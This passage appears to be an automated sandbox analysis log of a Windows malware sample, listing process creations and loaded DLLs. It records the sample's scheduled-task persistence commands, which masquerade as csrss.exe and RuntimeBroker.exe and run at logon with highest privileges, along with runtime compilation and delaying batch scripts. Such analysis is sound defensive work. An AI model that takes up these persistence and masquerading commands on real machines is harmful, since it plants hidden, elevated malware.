                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"
                              Source: unknownProcess created: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES22AB.tmp" "c:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMP"
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\user\RuntimeBroker.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "4ra1Fo2Zql4" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "4ra1Fo2Zql" /sc ONLOGON /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "4ra1Fo2Zql4" /sc MINUTE /mo 13 /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /rl HIGHEST /f
                              Source: unknownProcess created: C:\Users\user\Desktop\4ra1Fo2Zql.exe C:\Users\user\Desktop\4ra1Fo2Zql.exe
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IZdub348jc.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Users\user\Desktop\4ra1Fo2Zql.exe C:\Users\user\Desktop\4ra1Fo2Zql.exe
                              Source: unknownProcess created: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: unknownProcess created: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                              Source: unknownProcess created: C:\Users\user\RuntimeBroker.exe C:\Users\user\RuntimeBroker.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: unknownProcess created: C:\Users\user\RuntimeBroker.exe C:\Users\user\RuntimeBroker.exe
                              Source: unknownProcess created: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe "C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: unknownProcess created: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IZdub348jc.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2144.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCFABAA3A3EFF44E7388BEDB3353C25726.TMP"Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES22AB.tmp" "c:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMP"Jump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat" Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: mscoree.dll
